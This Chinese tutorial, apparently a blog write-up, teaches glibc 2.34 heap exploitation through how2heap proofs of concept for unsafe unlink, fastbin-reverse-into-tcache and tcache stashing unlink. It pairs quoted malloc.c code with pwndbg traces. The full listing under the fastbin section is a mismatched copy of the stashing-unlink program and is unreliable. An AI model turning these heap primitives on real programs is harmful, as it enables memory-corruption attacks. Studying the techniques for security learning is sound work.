unlink_chunk()对prev_size 和 fd和bk 进行了检测，可以通过构造的方式进行绕过。

free时的处理，只展示了我们需要调试的代码，并且我们构造的是相邻的上一个chunk。


 else if (!chunk_is_mmapped(p)) {
	
   /* If we're single-threaded, don't lock the arena.  */
   if (SINGLE_THREAD_P)
     have_lock = true;
	
   if (!have_lock)
     __libc_lock_lock (av->mutex);
	
   nextchunk = chunk_at_offset(p, size);
	
   /* Lightweight tests: check whether the block is already the
      top block.  */
   if (__glibc_unlikely (p == av->top))
     malloc_printerr ("double free or corruption (top)");
   /* Or whether the next chunk is beyond the boundaries of the arena.  */
   if (__builtin_expect (contiguous (av)
		  && (char *) nextchunk
		  >= ((char *) av->top + chunksize(av->top)), 0))
malloc_printerr ("double free or corruption (out)");
   /* Or whether the block is actually not marked used.  */
   if (__glibc_unlikely (!prev_inuse(nextchunk)))
     malloc_printerr ("double free or corruption (!prev)");
	
   nextsize = chunksize(nextchunk);
   if (__builtin_expect (chunksize_nomask (nextchunk) <= CHUNK_HDR_SZ, 0)
|| __builtin_expect (nextsize >= av->system_mem, 0))
     malloc_printerr ("free(): invalid next size (normal)");
	
   free_perturb (chunk2mem(p), size - CHUNK_HDR_SZ);
	
   /* consolidate backward */
   if (!prev_inuse(p)) {
     prevsize = prev_size (p);
     size += prevsize;
     p = chunk_at_offset(p, -((long) prevsize));
     if (__glibc_unlikely (chunksize(p) != prevsize))
       malloc_printerr ("corrupted size vs. prev_size while consolidating");
     unlink_chunk (av, p);
   }

unlink_chunk()，主要是利用里面的代码对某些地址进行修改。


/* Take a chunk off a bin list.  */
static void
unlink_chunk (mstate av, mchunkptr p)
{
  if (chunksize (p) != prev_size (next_chunk (p)))
    malloc_printerr ("corrupted size vs. prev_size");

  mchunkptr fd = p->fd;
  mchunkptr bk = p->bk;

  if (__builtin_expect (fd->bk != p || bk->fd != p, 0))
    malloc_printerr ("corrupted double-linked list");

  fd->bk = bk;
  bk->fd = fd;
  if (!in_smallbin_range (chunksize_nomask (p)) && p->fd_nextsize != NULL)
    {
      if (p->fd_nextsize->bk_nextsize != p
	  || p->bk_nextsize->fd_nextsize != p)
	malloc_printerr ("corrupted double-linked list (not small)");

      if (fd->fd_nextsize == NULL)
	{
	  if (p->fd_nextsize == p)
	    fd->fd_nextsize = fd->bk_nextsize = fd;
	  else
	    {
	      fd->fd_nextsize = p->fd_nextsize;
	      fd->bk_nextsize = p->bk_nextsize;
	      p->fd_nextsize->bk_nextsize = fd;
	      p->bk_nextsize->fd_nextsize = fd;
	    }
	}
      else
	{
	  p->fd_nextsize->bk_nextsize = p->bk_nextsize;
	  p->bk_nextsize->fd_nextsize = p->fd_nextsize;
	}
    }
}

源码


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <assert.h>
 
uint64_t *chunk0_ptr;
 
int main()
{
    setbuf(stdout, NULL);
    printf("Welcome to unsafe unlink 2.0!\n");
    printf("Tested in Ubuntu 20.04 64bit.\n");
    printf("This technique can be used when you have a pointer at a known location to a region you can call unlink on.\n");
    printf("The most common scenario is a vulnerable buffer that can be overflown and has a global pointer.\n");
 
    int malloc_size = 0x420; //we want to be big enough not to use tcache or fastbin
    int header_size = 2;
 
    printf("The point of this exercise is to use free to corrupt the global chunk0_ptr to achieve arbitrary memory write.\n\n");
 
    chunk0_ptr = (uint64_t*) malloc(malloc_size); //chunk0
    uint64_t *chunk1_ptr  = (uint64_t*) malloc(malloc_size); //chunk1
    printf("The global chunk0_ptr is at %p, pointing to %p\n", &chunk0_ptr, chunk0_ptr);
    printf("The victim chunk we are going to corrupt is at %p\n\n", chunk1_ptr);
 
    printf("We create a fake chunk inside chunk0.\n");
    printf("We setup the size of our fake chunk so that we can bypass the check introduced in https://sourceware.org/git/?p=glibc.git;a=commitdiff;h=d6db68e66dff25d12c3bc5641b60cbd7fb6ab44f\n");
    chunk0_ptr[1] = chunk0_ptr[-1] - 0x10;
    printf("We setup the 'next_free_chunk' (fd) of our fake chunk to point near to &chunk0_ptr so that P->fd->bk = P.\n");
    chunk0_ptr[2] = (uint64_t) &chunk0_ptr-(sizeof(uint64_t)*3);
    printf("We setup the 'previous_free_chunk' (bk) of our fake chunk to point near to &chunk0_ptr so that P->bk->fd = P.\n");
    printf("With this setup we can pass this check: (P->fd->bk != P || P->bk->fd != P) == False\n");
    chunk0_ptr[3] = (uint64_t) &chunk0_ptr-(sizeof(uint64_t)*2);
    printf("Fake chunk fd: %p\n",(void*) chunk0_ptr[2]);
    printf("Fake chunk bk: %p\n\n",(void*) chunk0_ptr[3]);
 
    printf("We assume that we have an overflow in chunk0 so that we can freely change chunk1 metadata.\n");
    uint64_t *chunk1_hdr = chunk1_ptr - header_size;
    printf("We shrink the size of chunk0 (saved as 'previous_size' in chunk1) so that free will think that chunk0 starts where we placed our fake chunk.\n");
    printf("It's important that our fake chunk begins exactly where the known pointer points and that we shrink the chunk accordingly\n");
    chunk1_hdr[0] = malloc_size;
    printf("If we had 'normally' freed chunk0, chunk1.previous_size would have been 0x430, however this is its new value: %p\n",(void*)chunk1_hdr[0]);
    printf("We mark our fake chunk as free by setting 'previous_in_use' of chunk1 as False.\n\n");
    chunk1_hdr[1] &= ~1;
 
    printf("Now we free chunk1 so that consolidate backward will unlink our fake chunk, overwriting chunk0_ptr.\n");
    printf("You can find the source of the unlink macro at https://sourceware.org/git/?p=glibc.git;a=blob;f=malloc/malloc.c;h=ef04360b918bceca424482c6db03cc5ec90c3e00;hb=07c18a008c2ed8f5660adba2b778671db159a141#l1344\n\n");
    free(chunk1_ptr);
 
    printf("At this point we can use chunk0_ptr to overwrite itself to point to an arbitrary location.\n");
    char victim_string[8];
    strcpy(victim_string,"Hello!~");
    chunk0_ptr[3] = (uint64_t) victim_string;
 
    printf("chunk0_ptr is now pointing where we want, we use it to overwrite our victim string.\n");
    printf("Original value: %s\n",victim_string);
    chunk0_ptr[0] = 0x4141414142424242LL;
    printf("New Value: %s\n",victim_string);
 
    // sanity check
    assert(*(long *)victim_string == 0x4141414142424242L);
}

简化版本如下。


#include <stdio.h>
#include <stdlib.h>
#include <assert.h>
int main()
{
    size_t *pre = (size_t *) malloc(0x30);
    pre[1] = 0x31;
    pre[2] = (size_t)&pre- 0x18;
    pre[3] = (size_t)&pre- 0x10;
    size_t *a = (size_t *)malloc(0x410);
    size_t *head = a - 2;
    head[0] = 0x30;
    head[1] &= ~1;
    free(a);
    assert((size_t)pre == (size_t)&pre - 0x18);
}

调试

首先是很巧妙的构造了一段内存，作为伪chunk，并且巧妙的设计，可以使其绕过unlink_chunk()函数中fd->bk != p || bk->fd != p的检测。

先看看构造后的内存。

可以看到，这里实际上构造了3个chunk，并且栈上的两个chunk实际上起作用的只有fd和bk指针，绕过时会需要。

继续向下看这几句代码，是为了绕过一些检测。

 ► 10     size_t *a = (size_t *)malloc(0x410);  //申请0x410的空间。
   11     size_t *head = a - 2; //head头就是chunk头
   12     head[0] = 0x30;   //修改prev_size为0x30
   13     head[1] &= ~1;    //修改PREV_INUSE位为0，标志着这个chunk是未使用状态。

内存如下。

pwndbg> p head
$2 = (size_t *) 0x55555555a2d0
pwndbg> x /16gx head
0x55555555a2d0: 0x0000000000000030      0x0000000000000420
0x55555555a2e0: 0x0000000000000000      0x0000000000000000
0x55555555a2f0: 0x0000000000000000      0x0000000000000000
0x55555555a300: 0x0000000000000000      0x0000000000000000
0x55555555a310: 0x0000000000000000      0x0000000000000000
0x55555555a320: 0x0000000000000000      0x0000000000000000
0x55555555a330: 0x0000000000000000      0x0000000000000000
0x55555555a340: 0x0000000000000000      0x0000000000000000
pwndbg>

调试进入free函数。

由于0x410大小的原因，我们不会进入tcache bin或者fastbin，而是会进入other non-mmapped chunks对应的处理代码。

先调用chunk_is_mmapped()检测是否是mmapp chunks。

然后

/* consolidate backward */
if (!prev_inuse(p)) {        //检测这个chunk是否inuse，我们已经设置过了，所以这里会进入if里面的语句。
  prevsize = prev_size (p);            //获得prevsize，即0x30
  size += prevsize;
  p = chunk_at_offset(p, -((long) prevsize));        //获取相邻上一个chunk的地址
  if (__glibc_unlikely (chunksize(p) != prevsize))//判断相邻上一个chunk的大小和prevsize是否相等。
    malloc_printerr ("corrupted size vs. prev_size while consolidating");
  unlink_chunk (av, p);        //然后进入unlink_chunk，注意这里的p是相邻上一个chunk的地址
}

可以看到将上一个相邻chunk的地址传入了unlink_chunk()函数，这个chunk，实际上是我们构造的chunk。

接下来进入这个函数，再次检测了size是否对应相等。

1629   if (chunksize (p) != prev_size (next_chunk (p)))
1630     malloc_printerr ("corrupted size vs. prev_size");

接下来则是fd和bk的检测。

最后就是修改了。

所以最后(size_t)pre == (size_t)&pre - 0x18。

fast_bin_reverse_into_tcache_glibc2.34

原理

和上面的tcache_poisoning_glibc2.34差不多，只不过多了一点，就是当tcache有空闲时，一次malloc和会将fastbin中的chunk装到tcache的剩余空间里面。

所以我们可以利用这个特性，修改fastbin链中的fd指针为我们的target地址，然后如果tcache有空闲，就会将剩下的chunk移到tcache，直到填满tcache，这样tcachebin链的头指针就指向target，再次malloc就会申请到target对应的空间。

源码

#include <stdio.h>
#include <stdlib.h>
#include <assert.h>
 
int main(){
    unsigned long stack_var[0x10] = {0};
    unsigned long *chunk_lis[0x10] = {0};
    unsigned long *target;
 
    setbuf(stdout, NULL);
 
    printf("This file demonstrates the stashing unlink attack on tcache.\n\n");
    printf("This poc has been tested on both glibc-2.27, glibc-2.29 and glibc-2.31.\n\n");
    printf("This technique can be used when you are able to overwrite the victim->bk pointer. Besides, it's necessary to alloc a chunk with calloc at least once. Last not least, we need a writable address to bypass check in glibc\n\n");
    printf("The mechanism of putting smallbin into tcache in glibc gives us a chance to launch the attack.\n\n");
    printf("This technique allows us to write a libc addr to wherever we want and create a fake chunk wherever we need. In this case we'll create the chunk on the stack.\n\n");
 
    // stack_var emulate the fake_chunk we want to alloc to
    printf("Stack_var emulates the fake chunk we want to alloc to.\n\n");
    printf("First let's write a writeable address to fake_chunk->bk to bypass bck->fd = bin in glibc. Here we choose the address of stack_var[2] as the fake bk. Later we can see *(fake_chunk->bk + 0x10) which is stack_var[4] will be a libc addr after attack.\n\n");
 
    stack_var[3] = (unsigned long)(&stack_var[2]);
 
    printf("You can see the value of fake_chunk->bk is:%p\n\n",(void*)stack_var[3]);
    printf("Also, let's see the initial value of stack_var[4]:%p\n\n",(void*)stack_var[4]);
    printf("Now we alloc 9 chunks with malloc.\n\n");
 
    //now we malloc 9 chunks
    for(int i = 0;i < 9;i++){
        chunk_lis[i] = (unsigned long*)malloc(0x90);
    }
 
    //put 7 chunks into tcache
    printf("Then we free 7 of them in order to put them into tcache. Carefully we didn't free a serial of chunks like chunk2 to chunk9, because an unsorted bin next to another will be merged into one after another malloc.\n\n");
 
    for(int i = 3;i < 9;i++){
        free(chunk_lis[i]);
    }
 
    printf("As you can see, chunk1 & [chunk3,chunk8] are put into tcache bins while chunk0 and chunk2 will be put into unsorted bin.\n\n");
 
    //last tcache bin
    free(chunk_lis[1]);
    //now they are put into unsorted bin
    free(chunk_lis[0]);
    free(chunk_lis[2]);
 
    //convert into small bin
    printf("Now we alloc a chunk larger than 0x90 to put chunk0 and chunk2 into small bin.\n\n");
 
    malloc(0xa0);// size > 0x90
 
    //now 5 tcache bins
    printf("Then we malloc two chunks to spare space for small bins. After that, we now have 5 tcache bins and 2 small bins\n\n");
 
    malloc(0x90);
    malloc(0x90);
 
    printf("Now we emulate a vulnerability that can overwrite the victim->bk pointer into fake_chunk addr: %p.\n\n",(void*)stack_var);
 
    //change victim->bck
    /*VULNERABILITY*/
    chunk_lis[2][1] = (unsigned long)stack_var;
    /*VULNERABILITY*/
 
    //trigger the attack
    printf("Finally we alloc a 0x90 chunk with calloc to trigger the attack. The small bin preiously freed will be returned to user, the other one and the fake_chunk were linked into tcache bins.\n\n");
 
    calloc(1,0x90);
 
    printf("Now our fake chunk has been put into tcache bin[0xa0] list. Its fd pointer now point to next free chunk: %p and the bck->fd has been changed into a libc addr: %p\n\n",(void*)stack_var[2],(void*)stack_var[4]);
 
    //malloc and return our fake chunk on stack
    target = malloc(0x90);  
 
    printf("As you can see, next malloc(0x90) will return the region our fake chunk: %p\n",(void*)target);
 
    assert(target == &stack_var[2]);
    return 0;
}

简化后。


#include <stdio.h>
#include <stdlib.h>
#include <assert.h>
int main(){
    size_t stack_var[4];
    size_t *ptrs[14];
    for (int i = 0; i < 14; i++) ptrs[i] = malloc(0x40);
    for (int i = 0; i < 14; i++) free(ptrs[i]);
    for (int i = 0; i < 7; i++) ptrs[i] = malloc(0x40); // clean tcache
    size_t *victim = ptrs[7];
    victim[0] = (long)&stack_var[0] ^ ((long)victim >> 12); //poison fastbin
    malloc(0x40); // trigger,get one from fastbin then move the rest to tcache
    size_t *q = malloc(0x40);
    assert(q == &stack_var[2]);
}

调试

第一部分是，先申请14块相同大小的堆空间，然后完全释放，这样会填满这一大小的tcache bin和fast bin，接着再malloc7块堆内存，会优先从tcache bin中使用，造成tcache bin链为空的fast bin为是满的的情况。

紧接着，开始构造，使fast bin链的第一个chunk的fd等于栈上的地址，但是是经过加密后的地址，这点在tcache_poisoning_glibc2.34有讲过，查看内存和fastbin链，我们修改的是fastbin链中最后一个chunk的fd，这个点后面在的malloc分析fastbin的chunk移动到tcache bin中会分析解释。

现在的内存空间。

接下来调试malloc内部，查看malloc.c源码中是怎么将fastbin中的chunk移动到空闲的tcache bin中的。

主要代码在_int_malloc函数中，根据调试情况，我在下面的代码中给了相应注释。


//比较当前fastbin链的大小是否在fastbin的范围内。
  if ((unsigned long) (nb) <= (unsigned long) (get_max_fast ()))
    {
		//根据nb，也就是size，获得对应fastbin链的index，也就是第几条链。
      idx = fastbin_index (nb);
		//获取对应index的fastbin链头。
      mfastbinptr *fb = &fastbin (av, idx);
      mchunkptr pp;
      victim = *fb;

      if (victim != NULL)
	{
	  if (__glibc_unlikely (misaligned_chunk (victim)))
	    malloc_printerr ("malloc(): unaligned fastbin chunk detected 2");
		
		//获取fastbin链第一个chunk的的fd。
	  if (SINGLE_THREAD_P)
	    *fb = REVEAL_PTR (victim->fd);
	  else
	    REMOVE_FB (fb, pp, victim);
	  if (__glibc_likely (victim != NULL))
	    {
	      size_t victim_idx = fastbin_index (chunksize (victim));
	      if (__builtin_expect (victim_idx != idx, 0))
		malloc_printerr ("malloc(): memory corruption (fast)");
	      check_remalloced_chunk (av, victim, nb);
#if USE_TCACHE
	      /* While we're here, if we see other chunks of the same size,
		 stash them in the tcache.  */
	      size_t tc_idx = csize2tidx (nb);
	      if (tcache && tc_idx < mp_.tcache_bins)
		{
		  mchunkptr tc_victim;

		  /* While bin not empty and tcache not full, copy chunks.  */
		 //当这个size的tcache bin链存储的chunk个数小于7时，且*fb不为0，就不断将fastbin中的chunk移动到tcachebin中
		  while (tcache->counts[tc_idx] < mp_.tcache_count
			 && (tc_victim = *fb) != NULL)
		    {
		      if (__glibc_unlikely (misaligned_chunk (tc_victim)))
			malloc_printerr ("malloc(): unaligned fastbin chunk detected 3");
			//让fb指向tc_victim的fd
		      if (SINGLE_THREAD_P)
			*fb = REVEAL_PTR (tc_victim->fd);
		      else
			{
			  REMOVE_FB (fb, pp, tc_victim);
			  if (__glibc_unlikely (tc_victim == NULL))
			    break;
			}
		      tcache_put (tc_victim, tc_idx);
		    }
		}
#endif
	      void *p = chunk2mem (victim);
	      alloc_perturb (p, bytes);
	      return p;
	    }
	}

分析之后我们就知道为什么我们修改的是fastbin链中最后一个chunk的fd，因为从fastbin中取出chunk是从fastbin的头开始取，然后用头插法插入tcachebin，所以fastbin前面的的chunk会放到tcachebin的后面。

展示一个图。

执行完第一个malloc后，当前bins结构，可以看到除了拿出的一个chunk，剩下的chunk都移动到了tcachebin中了。

pwndbg> bins
tcachebins
0x50 [  7]: 0x7fffffffde40 —▸ 0x55555555a4d0 —▸ 0x55555555a520 —▸ 0x55555555a570 —▸ 0x55555555a5c0 —▸ 0x55555555a610 —▸ 0x55555555a660 ◂— 0x0
fastbins
0x20: 0x0
0x30: 0x0
0x40: 0x0
0x50: 0xfffffff800000002
0x60: 0x0
0x70: 0x0
0x80: 0x0
unsortedbin
all: 0x0
smallbins
empty
largebins
empty

可以看到tcachebins第一个fd经过解密后，就会指向栈上的那段空间。

tcache_stashing_unlink_attack_glibc2.34

原理

需要知道的知识点

malloc时，如果在遍历unsorted bin的时候，遍历到的chunk不是恰好合适的大小，就会将这个遍历过的chunk放入对应的small bin或者large bin中。
small bin的结构。

源码


#include <stdio.h>
#include <stdlib.h>
#include <assert.h>
 
int main(){
    unsigned long stack_var[0x10] = {0};
    unsigned long *chunk_lis[0x10] = {0};
    unsigned long *target;
 
    setbuf(stdout, NULL);
 
    printf("This file demonstrates the stashing unlink attack on tcache.\n\n");
    printf("This poc has been tested on both glibc-2.27, glibc-2.29 and glibc-2.31.\n\n");
    printf("This technique can be used when you are able to overwrite the victim->bk pointer. Besides, it's necessary to alloc a chunk with calloc at least once. Last not least, we need a writable address to bypass check in glibc\n\n");
    printf("The mechanism of putting smallbin into tcache in glibc gives us a chance to launch the attack.\n\n");
    printf("This technique allows us to write a libc addr to wherever we want and create a fake chunk wherever we need. In this case we'll create the chunk on the stack.\n\n");
 
    // stack_var emulate the fake_chunk we want to alloc to
    printf("Stack_var emulates the fake chunk we want to alloc to.\n\n");
    printf("First let's write a writeable address to fake_chunk->bk to bypass bck->fd = bin in glibc. Here we choose the address of stack_var[2] as the fake bk. Later we can see *(fake_chunk->bk + 0x10) which is stack_var[4] will be a libc addr after attack.\n\n");
 
    stack_var[3] = (unsigned long)(&stack_var[2]);
 
    printf("You can see the value of fake_chunk->bk is:%p\n\n",(void*)stack_var[3]);
    printf("Also, let's see the initial value of stack_var[4]:%p\n\n",(void*)stack_var[4]);
    printf("Now we alloc 9 chunks with malloc.\n\n");
 
    //now we malloc 9 chunks
    for(int i = 0;i < 9;i++){
        chunk_lis[i] = (unsigned long*)malloc(0x90);
    }
 
    //put 7 chunks into tcache
    printf("Then we free 7 of them in order to put them into tcache. Carefully we didn't free a serial of chunks like chunk2 to chunk9, because an unsorted bin next to another will be merged into one after another malloc.\n\n");
 
    for(int i = 3;i < 9;i++){
        free(chunk_lis[i]);
    }
 
    printf("As you can see, chunk1 & [chunk3,chunk8] are put into tcache bins while chunk0 and chunk2 will be put into unsorted bin.\n\n");
 
    //last tcache bin
    free(chunk_lis[1]);
    //now they are put into unsorted bin
    free(chunk_lis[0]);
    free(chunk_lis[2]);
 
    //convert into small bin
    printf("Now we alloc a chunk larger than 0x90 to put chunk0 and chunk2 into small bin.\n\n");
 
    malloc(0xa0);// size > 0x90
 
    //now 5 tcache bins
    printf("Then we malloc two chunks to spare space for small bins. After that, we now have 5 tcache bins and 2 small bins\n\n");
 
    malloc(0x90);
    malloc(0x90);
 
    printf("Now we emulate a vulnerability that can overwrite the victim->bk pointer into fake_chunk addr: %p.\n\n",(void*)stack_var);
 
    //change victim->bck
    /*VULNERABILITY*/
    chunk_lis[2][1] = (unsigned long)stack_var;
    /*VULNERABILITY*/
 
    //trigger the attack
    printf("Finally we alloc a 0x90 chunk with calloc to trigger the attack. The small bin preiously freed will be returned to user, the other one and the fake_chunk were linked into tcache bins.\n\n");
 
    calloc(1,0x90);
 
    printf("Now our fake chunk has been put into tcache bin[0xa0] list. Its fd pointer now point to next free chunk: %p and the bck->fd has been changed into a libc addr: %p\n\n",(void*)stack_var[2],(void*)stack_var[4]);
 
    //malloc and return our fake chunk on stack
    target = malloc(0x90);  
 
    printf("As you can see, next malloc(0x90) will return the region our fake chunk: %p\n",(void*)target);
 
    assert(target == &stack_var[2]);
    return 0;
}

简化后


#include <stdio.h>
#include <stdlib.h>
#include <assert.h>
int main(){
    size_t stack_var[8] = {0};
    size_t *x[10];
    stack_var[3] = (size_t)(&stack_var[2]);
    for(int i = 0;i < 10;i++) x[i] = (size_t *)malloc(0x80);
    for(int i = 3;i < 10;i++) free(x[i]);
    free(x[0]);//into unsorted bin, x[1] avoid merge
    free(x[2]);//into unsorted bin
    malloc(0x100);// bigger so all into small bin
    malloc(0x80); // cash one from tcache bin
    malloc(0x80); // cash one from tcache bin
    x[2][1] = (size_t)stack_var;  //poison smallbin
    calloc(1,0x80); // cash x[0] from smallbin, move the other 2 into tcache bin
    assert(malloc(0x80) == &stack_var[2]);
    return 0;
}

调试

首先创建了伪chunk stack_var，然后填满了tcache bin，由于申请的是0x80size大小的堆空间，所以后面再free是不会进入fastbin的，而会进入unsorted bin，而为了防止free时，chunk合并，也就是unlink，我们只free，x[0]和x[2]。

此时bins如下，unsorted bin还是采用的头插法插入新chunk。

接下来调试malloc(0x100)，由于是0x100，会优先从unsorted bin寻找有没有合适的chunk，没有就会将unsorted bin链中的chunk放到small bin中。

主要代码如下，是通过bk指针倒序遍历出chunk，然后给到small bin的，所以最后的结果，small bin链和之前的unsorted bin链看起来是一样的。


for (;; )
{
    int iters = 0;
    //通过bk指针从尾部遍历unsorted bin，只剩头结点的时候结束
    while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av))
    {
        bck = victim->bk;
        size = chunksize (victim);
        mchunkptr next = chunk_at_offset (victim, size);
 
        if (__glibc_unlikely (size <= CHUNK_HDR_SZ) || __glibc_unlikely (size > av->system_mem))
            malloc_printerr ("malloc(): invalid size (unsorted)");
        if (__glibc_unlikely (chunksize_nomask (next) < CHUNK_HDR_SZ) || __glibc_unlikely (chunksize_nomask (next) > av->system_mem))
            malloc_printerr ("malloc(): invalid next size (unsorted)");
        if (__glibc_unlikely ((prev_size (next) & ~(SIZE_BITS)) != size))
            malloc_printerr ("malloc(): mismatching next->prev_size (unsorted)");
        if (__glibc_unlikely (bck->fd != victim)|| __glibc_unlikely (victim->fd != unsorted_chunks (av)))
            malloc_printerr ("malloc(): unsorted double linked list corrupted");
        if (__glibc_unlikely (prev_inuse (next)))
            malloc_printerr ("malloc(): invalid next->prev_inuse (unsorted)");
 
 
        /* remove from unsorted list */
        //检查BK的fd指针是否指向链表尾
        if (__glibc_unlikely (bck->fd != victim))
            malloc_printerr ("malloc(): corrupted unsorted chunks 3");
        //取走unsorted bin的最后一个chunk
        unsorted_chunks (av)->bk = bck;
        bck->fd = unsorted_chunks (av);
 
        /* place chunk in bin */
        //将取出unsorted bin中的chunk放入small bin
        if (in_smallbin_range (size))
        {
            //获取索引
            victim_index = smallbin_index (size);
            //头插法
            bck = bin_at (av, victim_index);
            fwd = bck->fd;
        }

		...
		...
		mark_bin (av, victim_index);
		victim->bk = bck;
		victim->fd = fwd;
		fwd->bk = victim;
		bck->fd = victim;

bins变换如下。

取出unsorted bin最后一个chunk。

unsortedbin
all: 0x55555555a3b0 —▸ 0x7ffff7fb2cc0 (main_arena+96) ◂— 0x55555555a3b0
smallbins
empty

将其给到small bin。

unsortedbin
all: 0x55555555a3b0 —▸ 0x7ffff7fb2cc0 (main_arena+96) ◂— 0x55555555a3b0
smallbins
0x90: 0x55555555a290 —▸ 0x7ffff7fb2d40 (main_arena+224) ◂— 0x55555555a290

再取出unsorted bin最后一个chunk。

unsortedbin
all: 0x0
smallbins
0x90: 0x55555555a290 —▸ 0x7ffff7fb2d40 (main_arena+224) ◂— 0x55555555a290

放入small bin

unsortedbin
all: 0x0
smallbins
0x90: 0x55555555a3b0 —▸ 0x55555555a290 —▸ 0x7ffff7fb2d40 (main_arena+224) ◂— 0x55555555a3b0

接下来，malloc(0x80)，让tcache bin空出两个位置，留个以后从small bin的chunk移动到tcache bin用，就不贴图了。

接下来就是构造了，我构造的fake_chunk，修改到了small bin链的最后，也就是修改了x[2]的bk的位置，至于为什么修改bk，个人认为还是因为是通过倒序遍历bk来获取small bin的chunk有关。

转换如下图所示。

此时small bin中的FD和BK链路如下。

这时候再调用calloc，calloc会遍历fast bin、small bin、large bin，和fast_bin_reverse_into_tcache_glibc2.34一样，如果取出chunk后，bin还有剩余的chunk，就会将其放入tcache bin中，但是有一点不同的是从small bin中取chunk是通过bk倒序来取的，前面也有体现。

代码还是差不多的。


  if (in_smallbin_range (nb))
    {
      idx = smallbin_index (nb);
      bin = bin_at (av, idx);

      if ((victim = last (bin)) != bin)
        {
          bck = victim->bk;
	  if (__glibc_unlikely (bck->fd != victim))
	    malloc_printerr ("malloc(): smallbin double linked list corrupted");
          set_inuse_bit_at_offset (victim, nb);
          bin->bk = bck;
          bck->fd = bin;

          if (av != &main_arena)
	    set_non_main_arena (victim);
          check_malloced_chunk (av, victim, nb);
#if USE_TCACHE
	  /* While we're here, if we see other chunks of the same size,
	     stash them in the tcache.  */
	  size_t tc_idx = csize2tidx (nb);
	  if (tcache && tc_idx < mp_.tcache_bins)
	    {
	      mchunkptr tc_victim;

	      /* While bin not empty and tcache not full, copy chunks over.  */
	      while (tcache->counts[tc_idx] < mp_.tcache_count
		     && (tc_victim = last (bin)) != bin)
		{
		  if (tc_victim != 0)
		    {
		      bck = tc_victim->bk;
		      set_inuse_bit_at_offset (tc_victim, nb);
		      if (av != &main_arena)
			set_non_main_arena (tc_victim);
		      bin->bk = bck;
		      bck->fd = bin;

		      tcache_put (tc_victim, tc_idx);
	            }
		}
	    }
#endif
          void *p = chunk2mem (victim);
          alloc_perturb (p, bytes);
          return p;
        }
    }

这样我们就会发现small bin中剩余的chunk都跑到的tcache bin中，构造的伪chunk就在tcache bin链中的第一个。

再次malloc即可申请到。

参考

[堆利用入门]malloc_chunk结构及宏定义

[原创]how2heap深入浅出学习堆利用

https://ctf-wiki.org/pwn/linux/user-mode/heap/ptmalloc2/tcache-attack/#0x02-tcache-usage